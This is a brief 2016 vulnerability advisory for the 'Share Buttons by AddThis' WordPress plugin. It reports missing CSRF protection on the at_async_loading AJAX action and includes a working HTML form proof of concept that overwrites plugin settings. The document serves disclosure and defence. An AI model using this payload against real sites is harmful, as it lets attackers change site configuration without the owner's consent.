Share Buttons by AddThis [CSRF]

Missing anti-CSRF checks to WordPress plugin Share Buttons by AddThis.

Description

Plugin Share Buttons by AddThis for WordPress is missing checks against Cross Site Request Forgery attacks when saving options through AJAX action at_async_loading. This could allow a malicious user to launch a CSRF attack in order to update plugin options with arbitrary values.

This action is available only if user made the choice to control the plugin from AddThis website. This option is available under Settings → Share Buttons by AddThis → Advanced Options → I want to control my plugin from... and is not enabled by default.

PoC

<form action="http://wp.dev/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="addthis_settings[data_ga_property]" value="XXXXXXX">
    <input type="hidden" name="addthis_settings[addthis_config_json]" value='{"username":"pWnD"}'>
    <input type="hidden" name="async_loading" value="1">
    <input type="hidden" name="action" value="at_async_loading">
    <input type="submit" value="Click Me">
</form>

---

WordPress Plugins CSRF

---

INFO

• 17 May 2016
• Pan Vag
• www.addthis.com
• wordpress.org
• 5.3.4
• WordPress 4.5
• DWF-2016-87042